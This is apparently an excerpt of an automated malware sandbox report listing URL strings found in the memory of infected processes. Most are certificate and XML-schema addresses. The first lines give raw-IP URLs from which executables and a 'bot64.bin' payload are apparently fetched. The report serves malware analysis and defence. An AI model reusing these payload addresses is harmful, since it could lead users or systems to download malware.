Source: explorer.exe, 00000004.00000000.1853103540.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://176.111.174.140/bin/bot64.bins
Source: explorer.exe, 00000004.00000000.1853103540.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://176.111.174.140/dy/
Source: explorer.exe, 00000004.00000003.1943155660.000000000AB5C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://176.111.174.140/x.exe
Source: explorer.exe, 00000004.00000003.1943155660.000000000AB5C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://176.111.174.140/zx.exe
Source: file.exe, svchost.exe, explorer.exe, 7D3ED97FB83B796922796.exe, audiodg.exe, msiexec.exe String found in binary or memory: http://176.111.174.177/bin/bot64.bin
Source: svchost.exe, 00000002.00000002.3071197547.000001301D095000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3086359645.000000000F5D0000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.3084379266.000000000CB63000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1853448227.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3079258886.000000000A020000.00000020.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1853992940.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2514586973.000000000CB72000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://176.111.174.177/bin/bot64.binhttp://176.111.174.140/bin/bot64.bininvalid
Source: file.exe, 7D3ED97FB83B796922796.exe.0.dr String found in binary or memory: http://176.111.174.177/bin/bot64.binhttp://176.111.174.140/bin/bot64.binprocexp.exeprocexp64.exeTOTA
Source: 7405.tmp.zx.exe, 00000011.00000003.2067655285.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE519D000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059971273.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2060246980.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5199000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059299269.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2068252412.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059491897.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059768742.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2066751113.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.17.dr, _socket.pyd.17.dr, _hashlib.pyd.17.dr, _ctypes.pyd.17.dr, _bz2.pyd.17.dr, select.pyd.17.dr, libcrypto-1_1.dll.17.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: explorer.exe, 00000004.00000000.1847603303.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2515139841.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3077647961.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1849441067.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3074143855.00000000079FB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: 7405.tmp.zx.exe, 00000011.00000003.2067655285.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE519D000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059971273.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2060246980.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5199000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059299269.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2068252412.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059491897.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059768742.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2066751113.000001BBE519D000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2066751113.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.17.dr, _socket.pyd.17.dr, _hashlib.pyd.17.dr, _ctypes.pyd.17.dr, _bz2.pyd.17.dr, select.pyd.17.dr, libcrypto-1_1.dll.17.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: 7405.tmp.zx.exe, 00000011.00000003.2059081249.000001BBE518F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.mic
Source: 7405.tmp.zx.exe, 00000011.00000003.2067655285.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059971273.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2060246980.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059299269.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2068252412.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059491897.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059768742.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2066751113.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.17.dr, _socket.pyd.17.dr, _hashlib.pyd.17.dr, _ctypes.pyd.17.dr, _bz2.pyd.17.dr, select.pyd.17.dr, libcrypto-1_1.dll.17.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: 7405.tmp.zx.exe, 00000011.00000003.2067655285.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE519D000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059971273.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2060246980.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5199000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059299269.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2068252412.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059491897.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059768742.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2066751113.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.17.dr, _socket.pyd.17.dr, _hashlib.pyd.17.dr, _ctypes.pyd.17.dr, _bz2.pyd.17.dr, select.pyd.17.dr, libcrypto-1_1.dll.17.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: explorer.exe, 00000004.00000000.1847603303.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2515139841.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3077647961.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1849441067.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3074143855.00000000079FB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: 7405.tmp.zx.exe, 00000011.00000003.2067655285.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE519D000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059971273.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2060246980.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5199000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059299269.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2068252412.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059491897.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059768742.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2066751113.000001BBE519D000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2066751113.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.17.dr, _socket.pyd.17.dr, _hashlib.pyd.17.dr, _ctypes.pyd.17.dr, _bz2.pyd.17.dr, select.pyd.17.dr, libcrypto-1_1.dll.17.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: 7405.tmp.zx.exe, 00000011.00000003.2067655285.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE519D000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059971273.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2060246980.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5199000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059299269.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2068252412.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059491897.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059768742.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2066751113.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.17.dr, _socket.pyd.17.dr, _hashlib.pyd.17.dr, _ctypes.pyd.17.dr, _bz2.pyd.17.dr, select.pyd.17.dr, libcrypto-1_1.dll.17.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: explorer.exe, 00000004.00000000.1847603303.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2515139841.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3077647961.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1849441067.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3074143855.00000000079FB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: 7405.tmp.zx.exe, 00000011.00000003.2067655285.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE519D000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059971273.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2060246980.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5199000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059299269.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2068252412.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059491897.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059768742.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2066751113.000001BBE519D000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2066751113.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.17.dr, _socket.pyd.17.dr, _hashlib.pyd.17.dr, _ctypes.pyd.17.dr, _bz2.pyd.17.dr, select.pyd.17.dr, libcrypto-1_1.dll.17.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: explorer.exe, 00000004.00000000.1847603303.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2515139841.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3077647961.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1849441067.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3074143855.00000000079FB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: 7405.tmp.zx.exe, 00000011.00000003.2067655285.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE519D000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059971273.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2060246980.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5199000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059299269.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2068252412.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059491897.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059768742.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2066751113.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.17.dr, _socket.pyd.17.dr, _hashlib.pyd.17.dr, _ctypes.pyd.17.dr, _bz2.pyd.17.dr, select.pyd.17.dr, libcrypto-1_1.dll.17.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: 7405.tmp.zx.exe, 00000011.00000003.2067655285.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE519D000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059971273.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2060246980.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5199000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059299269.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2068252412.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059491897.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059768742.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2066751113.000001BBE519D000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2066751113.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.17.dr, _socket.pyd.17.dr, _hashlib.pyd.17.dr, _ctypes.pyd.17.dr, _bz2.pyd.17.dr, select.pyd.17.dr, libcrypto-1_1.dll.17.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: explorer.exe, 00000004.00000002.3074143855.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1847603303.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: 7405.tmp.zx.exe, 00000011.00000003.2067655285.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069970928.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059971273.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2060246980.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059299269.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2068252412.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059491897.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2059768742.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2069300936.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, 7405.tmp.zx.exe, 00000011.00000003.2066751113.000001BBE5190000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.17.dr, _socket.pyd.17.dr, _hashlib.pyd.17.dr, _ctypes.pyd.17.dr, _bz2.pyd.17.dr, select.pyd.17.dr, libcrypto-1_1.dll.17.dr String found in binary or memory: http://ocsp.thawte.com0
Source: 7405.tmp.zx.exe, 00000012.00000002.2076606633.00007FFDFB05D000.00000002.00000001.01000000.0000000B.sdmp String found in binary or memory: http://python.org/dev/peps/pep-0263/
Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp, 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.datacontract.org/2004/07/System.ServiceModel
Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.datacontract.org/2004/07/System.ServiceModelD
Source: explorer.exe, 00000004.00000000.1848373265.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.1848816851.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.3079058227.0000000009B60000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002E11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002E11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: 4A64.tmp.x.exe, 00000009.00000002.2164093403.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
